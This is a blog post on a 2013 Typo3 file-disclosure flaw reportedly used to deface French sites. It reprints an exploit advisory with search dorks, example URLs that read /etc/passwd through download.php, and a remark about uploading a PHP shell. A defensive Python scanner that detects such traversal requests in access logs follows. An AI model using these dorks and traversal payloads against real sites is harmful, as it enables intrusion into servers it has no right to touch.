Tuesday, 28 January 2014
Exclusive: the vulnerability Algerian hackers used to compromise Western websites
As we saw, on 1 November a group of Algerian hackers took down hundreds of French websites.
After some research, the vulnerability used to compromise most of these sites, though not all of them, was identified; besides, some hackers prefer not to reveal their secrets.
But with knowledge there is no despair, and we will discover the other methods.
This is the vulnerability
And this is an example of the vulnerability
###########################
# Exploit Title : Typo3 File Disclosure
# Exploit Author : Iran Security Team
# Discovered By : Red.Eagle
# Home : WWW.IrSecTeam.org
# Dork1 : inurl:fileadmin/php/commun/download.php
# Dork2 : inurl:fileadmin/scripts/download.php
# Date: 2013 1 November
# Tested on:windows 7
# Software Link: http://typo3.org/
#Contact To Me: https://www.facebook.com
###########################
#
# Example :http://127.0.0.1/fileadmin/php/commu...2Fetc%2Fpasswd
#
# Example :http://127.0.0.1/fileadmin/scripts/d...2Fetc%2Fpasswd
#
# Example :http://127.0.0.1/fileadmin/php/downl...2Fetc%2Fpasswd
#
# Sp Tnx To : Special Tnx To : Det3cT0r - GoldHat - Mr.Rahgozar - Mehran BBC - Game Over - Z3ro C00l - Retn0Hack -
Saeed0511 - Ir.Soldier - Red.Eagle - Alimp5 - Arshia Mahkom -Poya21 - Exploit Black - Hot0n - 4m!r - Hasani_farhad -
InJecTable - Mosi.Pro - Kandgi_Boy And All Members Of Iran Security Team
#
#
###########################
Applying the exploit returns the contents of the server's /etc/passwd file.
You can also upload a shell by replacing the etc/passwd file with a link to a PHP shell.
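For site owners checking whether they were hit, the following is an added detection example, not part of the original post or the advisory: it scans web server access logs for requests to `download.php` scripts under `fileadmin/` whose parameter values decode to an absolute path, a directory traversal or a URL. The log lines are constructed, and the parameter name `p` is a placeholder because the advisory's URLs are truncated; the check inspects every parameter regardless of name.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# download.php anywhere under /fileadmin/, as in the paths the advisory lists.
SCRIPT_RE = re.compile(r"^/fileadmin/(?:[^/?]+/)*download\.php$", re.I)
# Request field of a combined-format log line: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

SAMPLE_LOG = [  # constructed lines; parameter name "p" is a placeholder
    '203.0.113.7 - - [01/Nov/2013:10:00:01 +0100] "GET /fileadmin/scripts/download.php?p=%2Fetc%2Fpasswd HTTP/1.1" 200 1843',
    '203.0.113.7 - - [01/Nov/2013:10:00:05 +0100] "GET /fileadmin/php/commun/download.php?p=..%252F..%252Fconf.php HTTP/1.1" 200 512',
    '203.0.113.7 - - [01/Nov/2013:10:00:09 +0100] "GET /fileadmin/scripts/download.php?p=http%3A%2F%2Fexample.invalid%2Fx.txt HTTP/1.1" 200 77',
    '198.51.100.4 - - [01/Nov/2013:10:01:00 +0100] "GET /fileadmin/scripts/download.php?p=brochure.pdf HTTP/1.1" 200 90211',
    '198.51.100.4 - - [01/Nov/2013:10:02:00 +0100] "GET /index.php?id=%2Fetc%2Fpasswd HTTP/1.1" 200 4000',
]

def classify_value(value):
    """Return a reason if a parameter value looks like path or URL abuse, else None."""
    for _ in range(3):  # decode again so double-encoded input (%252F) is normalised
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    lowered = value.lower()
    if re.match(r"^[a-z][a-z0-9+.-]*://", lowered):
        return "url-scheme"
    if "../" in lowered or "..\\" in lowered:
        return "traversal"
    if lowered.startswith("/") or re.match(r"^[a-z]:[\\/]", lowered):
        return "absolute-path"
    return None

def scan(lines):
    """Return (line_no, param, reason) for each suspicious download.php request."""
    hits = []
    for no, line in enumerate(lines, 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        target = urlsplit(m.group(1))
        if not SCRIPT_RE.match(unquote(target.path)):
            continue
        for name, value in parse_qsl(target.query, keep_blank_values=True):
            reason = classify_value(value)
            if reason:
                hits.append((no, name, reason))
    return hits

if __name__ == "__main__":
    print(scan(SAMPLE_LOG))
```

A hit with status 200 and a response size that differs from the script's normal downloads is the case to investigate first; the fix on the server side is to have the script serve only files resolved inside one fixed download directory.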